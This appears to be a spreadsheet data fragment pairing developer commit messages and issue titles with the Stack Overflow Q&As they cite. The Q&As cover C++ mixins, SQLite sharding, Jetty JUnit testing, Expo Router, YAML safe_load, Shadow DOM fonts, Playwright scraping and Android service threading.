https://stackoverflow.com/questions/18773367/what-are-mixins-as-a-concept</t>
  </si>
  <si>
    <t>Before going into what a mix-in is, it's useful to describe the problems it's trying to solve. Say you have a bunch of ideas or concepts you are trying to model. They may be related in some way but they are orthogonal for the most part -- meaning they can stand by themselves independently of each other. Now you might model this through inheritance and have each of those concepts derive from some common interface class. Then you provide concrete methods in the derived class that implements that interface.
The problem with this approach is that this design does not offer any clear intuitive way to take each of those concrete classes and combine them together.
The idea with mix-ins is to provide a bunch of primitive classes, where each of them models a basic orthogonal concept, and be able to stick them together to compose more complex classes with just the functionality you want -- sort of like legos. The primitive classes themselves are meant to be used as building blocks. This is extensible since later on you can add other primitive classes to the collection without affecting the existing ones.
Getting back to C++, a technique for doing this is using templates and inheritance. The basic idea here is you connect these building blocks together by providing them via the template parameter. You then chain them together, eg. via
typedef
, to form a new type containing the functionality you want.
Taking your example, let say we want to add a redo functionality on top. Here's how it might look like:
#include &lt;iostream&gt;
using namespace std;
struct Number
{
  typedef int value_type;
  int n;
  void set(int v) { n = v; }
  int get() const { return n; }
};
template &lt;typename BASE, typename T = typename BASE::value_type&gt;
struct Undoable : public BASE
{
  typedef T value_type;
  T before;
  void set(T v) { before = BASE::get(); BASE::set(v); }
  void undo() { BASE::set(before); }
};
template &lt;typename BASE, typename T = typename BASE::value_type&gt;
struct Redoable : public BASE
{
  typedef T value_type;
  T after;
  void set(T v) { after = v; BASE::set(v); }
  void redo() { BASE::set(after); }
};
typedef Redoable&lt; Undoable&lt;Number&gt; &gt; ReUndoableNumber;
int main()
{
  ReUndoableNumber mynum;
  mynum.set(42); mynum.set(84);
  cout &lt;&lt; mynum.get() &lt;&lt; '\n';  // 84
  mynum.undo();
  cout &lt;&lt; mynum.get() &lt;&lt; '\n';  // 42
  mynum.redo();
  cout &lt;&lt; mynum.get() &lt;&lt; '\n';  // back to 84
}
You'll notice I made a few changes from your original:
The virtual functions really aren't necessary here because we know exactly what our composed class type is at compile-time.
I've added a default
value_type
for the second template param to make its usage less cumbersome. This way you don't have to keep typing
&lt;foobar, int&gt;
everytime you stick a piece together.
Instead of creating a new class that inherits from the pieces, a simple
typedef
is used.
Note that this is meant to be a simple example to illustrate the mix-in idea. So it doesn't take into account corner cases and funny usages. For example, performing an
undo
without ever setting a number probably won't behave as you might expect.
As a sidenote, you might also find
this article
helpful.</t>
  </si>
  <si>
    <t>Starting a mixin for ZstPlugs that will make it an extensible reactin
g plug with callbacks.
https://stackoverflow.com/questions/18773367/what-are-mixins-as-a-concept</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on a web app that is somewhere between an email service and a social network.  I feel it has the potential to grow really big in the future, so I'm concerned about scalability.
Instead of using one centralized MySQL/InnoDB database and then partitioning it when that time comes, I've decided to create a separate SQLite database for each active user: one active user per 'shard'.
That way backing up the database would be as easy as copying each user's small database file to a remote location once a day.
Scaling up will be as easy as adding extra hard disks to store the new files.
When the app grows beyond a single server I can link the servers together at the filesystem level using GlusterFS and run the app unchanged, or rig up a simple SQLite proxy system that will allow each server to manipulate sqlite files in adjacent servers.
Concurrency issues will be minimal because each HTTP request will only touch one or two database files at a time, out of thousands, and SQLite only blocks on reads anyway.
I'm betting that this approach will allow my app to scale gracefully and support lots of cool and unique features. Am I betting wrong?  Am I missing anything?
UPDATE I decided to go with a less extreme solution, which is working fine so far.  I'm using a fixed number of shards - 256 sqlite databases, to be precise.  Each user is assigned and bound to a random shard by a simple hash function.  
Most features of my app require access to just one or two shards per request, but there is one in particular that requires the execution of a simple query on 10 to 100 different shards out of 256, depending on the user.  Tests indicate it would take about 0.02 seconds, or less, if all the data is cached in RAM.  I think I can live with that!
UPDATE 2.0 I ported the app to MySQL/InnoDB and was able to get about the same performance for regular requests, but for that one request that requires shard walking, innodb is 4-5 times faster.  For this reason, and other reason, I'm dropping this architecture, but I hope someone somewhere finds a use for it...thanks.
</t>
  </si>
  <si>
    <t>C103</t>
  </si>
  <si>
    <t>network.HTMLFetcher - add integration test with empty webpage
Use an embedded Jetty server to serve a hard coded resource file as
a response to all requests, then make a request and expect that
response.
This is a sloppy commit because we need to be checking that the
parse trees of the resultant HTML is identical, not that the strings
are identical. We need a cute hack to remove a valid but unusual
line break that WebKit inserts into the very sparse page.
Also the test class isn't factored well at all and isn't extensible.
However this is a decent start. If this test ever fails you've
probably not installed PhantomJS properly! However the debug trace
should tell you what's failing.
[1] from one of the Jetty maintainers was very useful; I've just
copied one of their techniques for how they test their code.
[1] http://stackoverflow.com/questions/19113359/sending-request-to-the-newly-created-jetty-server-for-testing-purposes</t>
  </si>
  <si>
    <t>Quick answer:
Remove the server.join() line.  That line makes the junit thread wait until the server thread stops.  Which is not needed for unit testing.
Long answer:
What we (the jetty developers) have learned about using jetty embedded servers with junit.
Use the @Before and @After annotations to start and stop the server if you have 1 test method, or some requirement that the server be pristine between test methods.
Example @Before / @After (Jetty 9.x):
public class MyTest
{
     private Server server;
     private URI serverUri;
     @Before
     public void startServer() throws Exception
     {
        this.server = new Server();
        ServerConnector connector = new ServerConnector(server);
        connector.setPort(0); // let connector pick an unused port #
        server.addConnector(connector);
        ServletContextHandler context = new ServletContextHandler();
        context.setContextPath("/");
        server.setHandler(context);
        // Serve capture servlet
        context.addServlet(new ServletHolder(new MyServlet()),"/my/*");
        // Start Server
        server.start();
        String host = connector.getHost();
        if (host == null)
        {
            host = "localhost";
        }
        int port = connector.getLocalPort();
        this.serverUri = new URI(String.format("http://%s:%d/",host,port));
    }
    @After
    public void stopServer()
    {
        try
        {
            server.stop();
        }
        catch (Exception e)
        {
            e.printStackTrace(System.err);
        }
    }
    @Test
    public void testMe()
    {
        // Issue request to server
        URI requestUri = serverUri.resolve("/my/test");
        // assert the response
    }
}
This technique makes the server start on port 0, which is a magic number that tells the underlying stack to pick an empty port and start listening.  The test case then asks the server what port number it is listening on and builds out the serverUri field to be appropropriate for this test run.
This technique works great, however, it will start/stop the server for each method.
Enter, the better technique, use the @BeforeClass and @AfterClass annotations to start/stop the server once for the entire test class, running all of the methods inside of the test class against this started server.
Example @BeforeClass / @AfterClass (Jetty 9.x):
public class MyTest
{
     private static Server server;
     private static URI serverUri;
     @BeforeClass
     public static void startServer() throws Exception
     {
        server = new Server();
        ServerConnector connector = new ServerConnector(server);
        connector.setPort(0); // let connector pick an unused port #
        server.addConnector(connector);
        ServletContextHandler context = new ServletContextHandler();
        context.setContextPath("/");
        server.setHandler(context);
        // Serve capture servlet
        context.addServlet(new ServletHolder(new MyServlet()),"/my/*");
        // Start Server
        server.start();
        String host = connector.getHost();
        if (host == null)
        {
            host = "localhost";
        }
        int port = connector.getLocalPort();
        serverUri = new URI(String.format("http://%s:%d/",host,port));
    }
    @AfterClass
    public static void stopServer()
    {
        try
        {
            server.stop();
        }
        catch (Exception e)
        {
            e.printStackTrace(System.err);
        }
    }
    @Test
    public void testMe()
    {
        // Issue request to server
        URI requestUri = serverUri.resolve("/my/test");
        // assert the response
    }
}
Doesn't look much different?  Yes, the changes are subtle.  @Before became @BeforeClass, @After became @AfterClass.  The start/stop methods are now static.  The server and serverUri fields are now static.
This technique is used where we have dozens of test methods that access the same server, and those requests do not alter the state in the server.  This speeds up the test case execution by simply not recreating the server between each test method.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope everyone is doing well!&lt;/p&gt;
&lt;p&gt;I am currently working on an expo sdk 52 and typescript, I'm using expo router to navigate between the screens, and currently I'm working on an authentication system, so I'm facing an issue! &lt;strong&gt;Expo router cannot detect my routes!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have a folder structure like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;app
  admin
    _layout.tsx
    index.tsx
    menu.tsx
  auth
    _layout.tsx
    forgotPassword.tsx
    index.tsx (login)
  client
    _layout.tsx
    index.tsx
    menu.tsx
  _layout.tsx
  +not-found.tsx
routes
  protected.routes.tsx
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is my &lt;strong&gt;app/_layout.tsx&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import {
  DarkTheme,
  DefaultTheme,
  ThemeProvider,
} from '@react-navigation/native';
import { useFonts } from 'expo-font';
import { Stack, useRootNavigationState, useSegments } from 'expo-router';
import * as SplashScreen from 'expo-splash-screen';
import { StatusBar } from 'expo-status-bar';
import { useEffect } from 'react';
import 'react-native-reanimated';
import { QueryClient, QueryClientProvider } from 'react-query';
import { useColorScheme } from '@/hooks/useColorScheme';
import { AuthProvider } from '@/context/auth.context';
import ToastProvider from '@/context/toast.context';
SplashScreen.preventAutoHideAsync();
export default function RootLayout() {
  const colorScheme = useColorScheme();
  const [loaded] = useFonts({
     'Inter-Light': require('../assets/fonts/Inter/Inter-Light.ttf'),
     'Inter-Regular': require('../assets/fonts/Inter/Inter-Regular.ttf'),
     'Inter-Medium': require('../assets/fonts/Inter/Inter-Medium.ttf'),
     'Inter-SemiBold': require('../assets/fonts/Inter/Inter-SemiBold.ttf'),
     'Inter-Bold': require('../assets/fonts/Inter/Inter-Bold.ttf'),
     'Inter-ExtraBold': require('../assets/fonts/Inter/Inter-ExtraBold.ttf'),
     'Bagoss-Regular': require('../assets/fonts/Bagoss/BagossStandardTRIALRegular.ttf'),
     'Bagoss-Medium': require('../assets/fonts/Bagoss/BagossStandardTRIAL-Medium.ttf'),
     'Bagoss-Bold': require('../assets/fonts/Bagoss/BagossStandardTRIAL-Bold.ttf'),
     'Bagoss-Light': require('../assets/fonts/Bagoss/BagossStandardTRIAL-Light.ttf'),
   });
   console.log(useRootNavigationState());
   console.log('-------', useSegments());
   const queryClient = new QueryClient({
     defaultOptions: {
       queries: { retry: true },
     },
   });
   useEffect(() =&amp;gt; {
     if (loaded) {
       SplashScreen.hideAsync();
     }
   }, [loaded]);
   if (!loaded) {
      return null;
   }
   return (
      &amp;lt;AuthProvider&amp;gt;
       &amp;lt;ToastProvider&amp;gt;
          &amp;lt;QueryClientProvider client={queryClient}&amp;gt;
            &amp;lt;ThemeProvider
             value={colorScheme === 'dark' ? DarkTheme : DefaultTheme}
            &amp;gt;
              &amp;lt;Stack /&amp;gt;
            &amp;lt;StatusBar style=&amp;quot;auto&amp;quot; /&amp;gt;
           &amp;lt;/ThemeProvider&amp;gt;
        &amp;lt;/QueryClientProvider&amp;gt;
     &amp;lt;/ToastProvider&amp;gt;
   &amp;lt;/AuthProvider&amp;gt;
  );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also here is &lt;strong&gt;routes/protected.routes.tsx&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { useAuth } from '@/hooks/useAuth';
import { Redirect, Slot, useSegments } from 'expo-router';
import { ReactNode } from 'react';
type ProtectedRouteProps = {
  children: ReactNode;
};
export default function ProtectedRoute({ children }: ProtectedRouteProps) {
  const { auth } = useAuth();
  const segments = useSegments();
  if (!auth) {
    return &amp;lt;Redirect href=&amp;quot;/auth&amp;quot; /&amp;gt;;
  }
  if (segments[0] === 'admin' &amp;amp;&amp;amp; auth.role !== 'admin') {
    return &amp;lt;Redirect href=&amp;quot;/client&amp;quot; /&amp;gt;;
  }
  if (segments[0] === 'client' &amp;amp;&amp;amp; auth.role !== 'client') {
    return &amp;lt;Redirect href=&amp;quot;/admin&amp;quot; /&amp;gt;;
  }
  return &amp;lt;Slot /&amp;gt;;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As a result of the console logs&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  console.log(useRootNavigationState()); // {&amp;quot;index&amp;quot;: 0, &amp;quot;key&amp;quot;: &amp;quot;stack-GkzxKtSO4HYHhXeZIWrdu&amp;quot;, &amp;quot;preloadedRoutes&amp;quot;: [], &amp;quot;routeNames&amp;quot;: [&amp;quot;auth&amp;quot;, &amp;quot;tabs&amp;quot;, &amp;quot;admin&amp;quot;, &amp;quot;client&amp;quot;, &amp;quot;_sitemap&amp;quot;, &amp;quot;+not-found&amp;quot;], &amp;quot;routes&amp;quot;: [{&amp;quot;key&amp;quot;: &amp;quot;+not-found-ziqvXfNdJaLXTtm-nGB2y&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;+not-found&amp;quot;, &amp;quot;params&amp;quot;: undefined, &amp;quot;path&amp;quot;: &amp;quot;&amp;quot;}], &amp;quot;stale&amp;quot;: false, &amp;quot;type&amp;quot;: &amp;quot;stack&amp;quot;}
  console.log(useSegments()); // [&amp;quot;+not-found&amp;quot;]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;here is the versions i am using:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;expo&lt;/strong&gt;: ~52.0.33
&lt;strong&gt;expo-router&lt;/strong&gt;: ~4.0.17
&lt;strong&gt;react-native&lt;/strong&gt;: 0.76.7
&lt;strong&gt;react&lt;/strong&gt;: 18.3.1&lt;/p&gt;
&lt;p&gt;I appreciate your time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C104</t>
  </si>
  <si>
    <t>[Investigation] Discover which approach is better? Class based or function based #11
Implement the same logic thus far, but in class based approach and compare with current function based approach to see which one is better.
Here definition of better is:
More simplicity of final code
Better extensibility of final code
The decision should be made as a team and then make the final code base in main branch as one or the other
A good example of this is here:
https://stackoverflow.com/a/2627732/9168936</t>
  </si>
  <si>
    <t xml:space="preserve">Could you guys recommend some affordable SQL modeling tool which supports SQL Server, PostgreSQL and MySQL? I'm looking into up to $300 per license range. One tool per answer, please!
Thanks!
</t>
  </si>
  <si>
    <t>It appears that safe_load, by definition, does not let you deserialize your own classes. If you want it to be safe, I'd do something like this:
import yaml
class User(object):
    def __init__(self, name, surname):
       self.name= name
       self.surname= surname
    def yaml(self):
       return yaml.dump(self.__dict__)
    @staticmethod
    def load(data):
       values = yaml.safe_load(data)
       return User(values["name"], values["surname"])
user = User('spam', 'eggs')
serialized_user = user.yaml()
print "serialized_user:  %s" % serialized_user.strip()
#Network
deserialized_user = User.load(serialized_user)
print "name: %s, sname: %s" % (deserialized_user.name, deserialized_user.surname)
The advantage here is that you have absolute control over how your class is (de)serialized. That means that you won't get random executable code over the network and run it. The disadvantage is that you have absolute control over how your class is (de)serialized. That means you have to do a lot more work. ;-)</t>
  </si>
  <si>
    <t>C105</t>
  </si>
  <si>
    <t>Cannot be read from Web Components (Shadow DOM) #21
&lt;head&gt;
  &lt;script&gt;
    const template = document.createElement("template")
    template.innerHTML = `
&lt;style&gt;
  @import url("https://cdn.jsdelivr.net/npm/@mdi/font/css/materialdesignicons.min.css")
&lt;/style&gt;
&lt;i class="mdi mdi-account"&gt;&lt;/i&gt;
`
    class MyTag extends HTMLElement {
      connectedCallback() {
        if (true) {
          // Use Shadow DOM
          this.attachShadow({mode: "open"})
          this.shadowRoot.appendChild(template.content.cloneNode(true))
        } else {
          // Not Use Shadow DOM
          this.appendChild(template.content.cloneNode(true))
        }
      }
    }
    customElements.define("my-tag", MyTag)
    &lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;my-tag /&gt;
&lt;/body&gt;
&lt;/html&gt;
https://stackoverflow.com/questions/60504404/how-to-use-material-design-icons-in-a-web-component</t>
  </si>
  <si>
    <t xml:space="preserve">The @font-face CSS at-rule for the font you want to use must be declared in the main document, not in the Shadow DOM.
Because in your case it is defined in the materialdesignicons.min.css file, you'll need to load it in the main document via a global &lt;link&gt;.
Note that the CSS file won't be loaded twice thanks to the browser's cache.
Alternately, you could add it in the light DOM of the web component, or you could just declare the @font-face at-rule (copied from the materialdesignicons.css file).
Here is a running example:
customElements.define( "x-webcomponent", class extends HTMLElement {
    constructor() {
      super()
      this.attachShadow({ mode: "open" })
      this.shadowRoot.innerHTML = `
        &lt;link rel=stylesheet  href=https://cdn.materialdesignicons.com/4.9.95/css/materialdesignicons.min.css&gt;
        &lt;span class="mdi mdi-home"&gt;&lt;/span&gt;`
    }
    connectedCallback () {
      this.innerHTML = `&lt;style&gt;
          @font-face {
            font-family: "Material Design Icons";
            src: url("https://cdn.materialdesignicons.com/4.9.95/fonts/materialdesignicons-webfont.woff?v=4.9.95") format("woff");
          }
       &lt;/style&gt;`
    }
} )
&lt;x-webcomponent&gt;&lt;/x-webcomponent&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to scrape a page &lt;a href="https://www.innovation-line.com/four-color-photoimage-products/ventoux-210d-polyester-drawstring-cinch-pack-backpack-907.html" rel="nofollow noreferrer"&gt;product detail page&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;but I am not able to find the tag when the code runs. I print the parent tag out, and I see the &lt;code&gt;h2&lt;/code&gt; tag I want, and also when I enter the debugger I can get what I want.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import time
from bs4 import BeautifulSoup
from playwright.sync_api import sync_playwright
def playwright_get_soup(url, selector_to_wait_for=None, wait_after_page_load=None):
    with sync_playwright() as this_playwright:
        browser = this_playwright.chromium.launch()
        page = browser.new_page()
        page.goto(url)
        try:
            page.wait_for_load_state(&amp;quot;load&amp;quot;)
            if wait_after_page_load:
                time.sleep(wait_after_page_load)
        except:
            pass
        if selector_to_wait_for:
            page.wait_for_selector(selector_to_wait_for, timeout=15000)
        soup = BeautifulSoup(page.content(), &amp;quot;html.parser&amp;quot;)
        browser.close()
    return soup
def parse_product_detail_page(soup):
    parent_block = soup.find(&amp;quot;div&amp;quot;, class_=&amp;quot;primary_block&amp;quot;)
    name_and_id_box = parent_block.find(&amp;quot;div&amp;quot;, class_=&amp;quot;item-box&amp;quot;)
    print(name_and_id_box) # the h2 tag is visible here
    name_and_id_header = name_and_id_box.find(&amp;quot;h2&amp;quot;, class_=&amp;quot;col-xs-6 &amp;quot;)
    # import ipdb; ipdb.set_trace() # the h2 tag is also visible here
    id_and_raw_name = name_and_id_header.split(&amp;quot;#&amp;quot;, maxsplit=1) # this is where the program errors out
def scrape_product_detail_page(product_detail_url):
    try:
        soup = playwright_url_to_soup(product_detail_url, selector_to_wait_for=&amp;quot;.item-box&amp;quot;)
    except:
        return None
    parsed_data = parse_product_detail_page(soup)
    return parsed_data
result = scrape_product_detail_page(&amp;quot;https://www.innovation-line.com/four-color-photoimage-products/ventoux-210d-polyester-drawstring-cinch-pack-backpack-907.html&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would appreciate some help determining why &lt;code&gt;name_and_id_header&lt;/code&gt; keeps showing up as none. Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C106</t>
  </si>
  <si>
    <t>Add playisinline to Video component #54
Add a playisinline to the Video component to special case where we want video to autoplay on mute. This is for iOS - see here: https://stackoverflow.com/questions/43570460/html5-video-autoplay-on-iphone</t>
  </si>
  <si>
    <t>Does playsinline attribute help?
Here's what I have:
&lt;video autoplay loop muted playsinline class="video-background "&gt;
  &lt;source src="videos/intro-video3.mp4" type="video/mp4"&gt;
&lt;/video&gt;
See the comment on playsinline here: https://webkit.org/blog/6784/new-video-policies-for-ios/</t>
  </si>
  <si>
    <t xml:space="preserve">In a recent project I have nearly completed we used an architecture that as its top layer of interaction from the web/services layers uses XXXManager classes. 
For example, there is a windows services that runs on a scheduled basis that imports data from several diverse data sources into our system. Within this service several "Manager" classes are called i.e. CPImportScheduleManager, CPImportProcessManager etc..
Now these Manager classes do a lot more than just pass method up the chain for use in the web/service layers. For example my UserManager.Register() method doesn't just persist the user via lower level assemblies but it also send a WAP push to the user and determines the mobile handset used etc.
It has been suggested to me that this type of architecture I a common means of trying to get OOP to fit into a procedural model. I can see their point here, but what I am wondering is with this top level set of classes any web/service layer can simply call the same common method without having to rewrite code. Thus if I wanted to write a web service that at some point registered a user I could again just call the UserManager.Register() method without having to rewrite all the logic again. 
I never have been the best person to explain myself, but if my ramblings make sense please feel free to advise on your alternatives. 
Cheers, Chris.  
</t>
  </si>
  <si>
    <t>C107</t>
  </si>
  <si>
    <t>Adding new CustomSidebarPostsViews component to sidebar; keep getting
 error I can't seem to fix about unknown props within linkcontainer -- apparently it won't break UI -- more here http://stackoverflow.com/questions/38175958/react-bootstrap-warnings-about-unknown-props -- will fix later; following link could provide a useful clue: http://stackoverflow.com/questions/38187130/unknown-props-react-and-material-ui</t>
  </si>
  <si>
    <t>Not really an answer(new user, can't comment yet) but it seems that react recently upgraded to version 0.15.2 and part of the changes was giving off a warning for passing a unknown elements(or props) to dom.
This won't break your UI but would include annoying warning logs to your browser console.
Additional relevant links: https://github.com/react-bootstrap/react-bootstrap/issues/1970</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with tomcat 10, in our setup, &lt;strong&gt;autoDeploy&lt;/strong&gt; should be disabled.
I want to deploy a war file called ws-backend.war, which comes pre-packaged with &lt;strong&gt;context.xml&lt;/strong&gt;.
My setup works well with &lt;em&gt;autodeploy enabled&lt;/em&gt;, but after autoDeploy is disabled, tomcat does not expand my war file (ws-backend.war).
Here is what I have tried:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have also tried defininng a ws-backend.xml in $CATALINA_BASE/conf/Catalina/localhost, with following content, but it does not do anything.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;Context docBase=&amp;quot;ws-backend.war&amp;quot;/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;The only other way, I could manage to atleast deploy my application was to add a line in server.xml. But, in this setup, tomcat unpacks the application,but totally ignores my context.xml&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Context docBase=&amp;quot;ws-backend.war&amp;quot;/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is what I need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I want application specific configuration in context.xml packaged with the war file( I'm trying to follow the recommendation that we should not define context in server.xml)&lt;/li&gt;
&lt;li&gt;autoDeploy should be disabled&lt;/li&gt;
&lt;li&gt;Tomcat should unpack my war file and use the context.xml packaged with the war&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C108</t>
  </si>
  <si>
    <t>Sources for implementing the new Service-Handler implementation:
https://stackoverflow.com/questions/28915610/android-how-to-communicate-from-worker-thread-to-a-service
https://stackoverflow.com/questions/14985678/how-to-keep-the-android-client-connected-to-the-server-even-on-activity-changes</t>
  </si>
  <si>
    <t xml:space="preserve">I initially implemented an async task in my activity which sends data to the server. But when i changed activities the connection was lost. To avoid this my approach was to implement a service that centralizes the network operation and sends data to the server and the code for this service is given below
    import java.io.BufferedWriter;
    import java.io.OutputStreamWriter;
    import java.io.PrintWriter;
    import java.net.InetAddress;
    import java.net.Socket;
    import android.app.Service;
    import android.content.Intent;
    import android.os.Binder;
    import android.os.IBinder;
    import android.util.Log;
    import android.widget.Toast;
    public class SocketService extends Service {
	  public static final String SERVERIP = ""; //your computer IP address should be written here
	  public static final int SERVERPORT = 5000;
	  PrintWriter out;
	  Socket socket;
	  InetAddress serverAddr;
	@Override
	public IBinder onBind(Intent intent) {
		// TODO Auto-generated method stub
		System.out.println("I am in Ibinder onBind method");
		  return myBinder;
	}
	  private final IBinder myBinder = new LocalBinder();
	  TCPClient mTcpClient = new TCPClient();
	  public class LocalBinder extends Binder {
	        public SocketService getService() {
	        	System.out.println("I am in Localbinder ");
	            return SocketService.this;
	        }
	    }
	  @Override
	    public void onCreate() {
	        super.onCreate();
	        System.out.println("I am in on create");     
	    }
	  public void IsBoundable(){
	        Toast.makeText(this,"I bind like butter", Toast.LENGTH_LONG).show();
	    }
	  public void sendMessage(String message){
	        if (out != null &amp;&amp; !out.checkError()) {
	        	System.out.println("in sendMessage"+message);
	            out.println(message);
	            out.flush();
	        }
	    }
	  	@Override
	    public int onStartCommand(Intent intent,int flags, int startId){
	  		super.onStartCommand(intent, flags, startId);
	  		System.out.println("I am in on start");
	      //  Toast.makeText(this,"Service created ...", Toast.LENGTH_LONG).show();
	        Runnable connect = new connectSocket();
	        new Thread(connect).start();
	        return START_STICKY;
	    }
	  	class connectSocket implements Runnable {
	        @Override
	        public void run() {
	            try { 
	            	 //here you must put your computer's IP address.
		            serverAddr = InetAddress.getByName(SERVERIP);
		            Log.e("TCP Client", "C: Connecting...");
	            	//create a socket to make the connection with the server
	            	socket = new Socket(serverAddr, SERVERPORT);
	            	 try {
	                     //send the message to the server
	                     out = new PrintWriter(new BufferedWriter(new OutputStreamWriter(socket.getOutputStream())), true);
	                     Log.e("TCP Client", "C: Sent.");
	                     Log.e("TCP Client", "C: Done.");
	                 	} 
	            	 catch (Exception e) {
	                     Log.e("TCP", "S: Error", e);
	                 }
	            } catch (Exception e) {
	                Log.e("TCP", "C: Error", e);
	            }
	        }
	    }
	    @Override
	    public void onDestroy() {
	    	super.onDestroy();
	    	  try {
	              socket.close();
	          } catch (Exception e) {
	              // TODO Auto-generated catch block
	              e.printStackTrace();
	          }
	          socket = null;
	      }
	    }
Rotator.java is my activity which I bind to this service. Following are few pieces of code from my activity. 
	private ServiceConnection mConnection = new ServiceConnection() {
                //EDITED PART
		@Override
		public void onServiceConnected(ComponentName name, IBinder service) {
			// TODO Auto-generated method stub
			 mBoundService = ((SocketService.LocalBinder)service).getService();
		}
		@Override
		public void onServiceDisconnected(ComponentName name) {
			// TODO Auto-generated method stub
			 mBoundService = null;
		}
      };
	   private void doBindService() {
           bindService(new Intent(Rotator.this, SocketService.class), mConnection, Context.BIND_AUTO_CREATE);
           mIsBound = true;
           if(mBoundService!=null){
           mBoundService.IsBoundable();
           }
       }
       private void doUnbindService() {
           if (mIsBound) {
               // Detach our existing connection.
               unbindService(mConnection);
               mIsBound = false;
           }
       }
    @Override
	public void onCreate(Bundle savedInstanceState)
	{
		  super.onCreate(savedInstanceState);
		  gestureDetector = new GestureDetector(this, new GestureListener());
		  setContentView(R.layout.activity_rotator);
		  //Binding the activity to the service to perform client-server operations
		  //start service on create
			startService(new Intent(Rotator.this,SocketService.class));
			doBindService();
                      ...........
                      ...........
    }	
    @Override
    protected void onDestroy() {
        super.onDestroy();
        doUnbindService();
    }
Now as this service runs in the background, If i want to send some data to the server i use the following
     if(mBoundService!=null)
    {
        mBoundService.sendMessage("right");
    }
The code is right. The only mistake was that I was trying to start the service twice once in onServiceConnected() method and the other in onCreate() method.
I changed my code to start the service only in onCreate() method in the launcher activity. The rest of the activities directly bind to the service by using doBindService() method
</t>
  </si>
  <si>
    <t>It looks like I've finally nailed it!
In order to pass data from thread back to a service you will need to do this:
Subclass a Handler class inside of your service (call it e.g. a LocalHandler). You will have to make it static. Override a handleMessage method, it will receive messages from the thread.
Add a Handler argument to your Thread constructor. Instantiate your LocalHandler class in a service and inject it to your thread via constructor.
Save reference to the Handler inside of your thread and use it to send  messages whenever appropriate.
Here's the complete example:
Service Class
package com.example.app;
import android.app.Service;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Message;
import android.util.Log;
public class ConnectionService extends Service {
    protected ConnectionWorker thread;
    static class LocalHandler extends Handler {
        @Override
        public void handleMessage(Message msg) {
            Log.d(this.getClass().getName(), "Message received: " + (String) msg.obj);
        }
    }
    protected Handler handler;
    @Override
    public void onCreate() {
        super.onCreate();
        // Instantiating overloaded handler.
        this.handler = new LocalHandler();
        // Creating a connection worker thread instance.
        // Not starting it yet.
        // Injecting our handler.
        this.thread = new ConnectionWorker(this.handler);
        Log.d(this.getClass().getName(), "Service created");
    }
    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        Log.d(this.getClass().getName(), "Trying to start the service");
        // Checking if worker thread is already running.
        if (!this.thread.isAlive()) {
            Log.d(this.getClass().getName(), "Starting working thread");
            // Starting the worker thread.
            this.thread.start();
            Log.d(this.getClass().getName(), "Service started");
        }
        return Service.START_STICKY;
    }
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
    @Override
    public void onDestroy() {
        Log.d(this.getClass().getName(), "Stopping thread");
        // Stopping the thread.
        this.thread.interrupt();
        Log.d(this.getClass().getName(), "Stopping service");
        super.onDestroy();
        Log.d(this.getClass().getName(), "Service destroyed");
    }
}
Worker Class (Thread)
package com.example.app;
import android.os.Handler;
import android.os.Message;
import android.os.SystemClock;
import android.util.Log;
public class ConnectionWorker extends Thread {
    // Reference to service's handler.
    protected Handler handler;
    public ConnectionWorker(Handler handler) {
        super(ConnectionWorker.class.getName());
        // Saving injected reference.
        this.handler = handler;
    }
    @Override
    public void run() {
        super.run();
        Log.d(this.getClass().getName(), "Thread started");
        // Doing the work indefinitely.
        while (true) {
            if (this.isInterrupted()) {
                // Terminating this method when thread is interrupted.
                return;
            }
            Log.d(this.getClass().getName(), "Doing some work for 3 seconds...");
            // Sending a message back to the service via handler.
            Message message = this.handler.obtainMessage();
            message.obj = "Waiting for 3 seconds";
            this.handler.sendMessage(message);
            SystemClock.sleep(3 * 1000);
        }
    }
}
I hope it's a valid implementation. If you now a better approach - please let me know.</t>
  </si>
  <si>
    <t xml:space="preserve">I am considering building an application that is a blend of a dynamic language (python or ruby) and compiled language and need some help getting convincing myself that this is a good idea.
My thought are that I can use a dynamic language to get a lot of code written quickly, and then dropping down to a compiled language like c/c++ to implement performance critical code.  
I can see a lot of benefits of this approach:
Increased Productivity by primarily coding in the dynamic language
Availability of libraries from both languages
But there are also some downsides:
Maintaining a bridge between the two languages
Dependency on two languages and language/library bugs instead of one
What are the other pros/cons of this approach?  Does anybody know about any resources and/or best practices around this?
</t>
  </si>
  <si>
    <t>C109</t>
  </si>
  <si>
    <t>Fixed workout-audio. Fixed circular reference issue between parent an
d child.
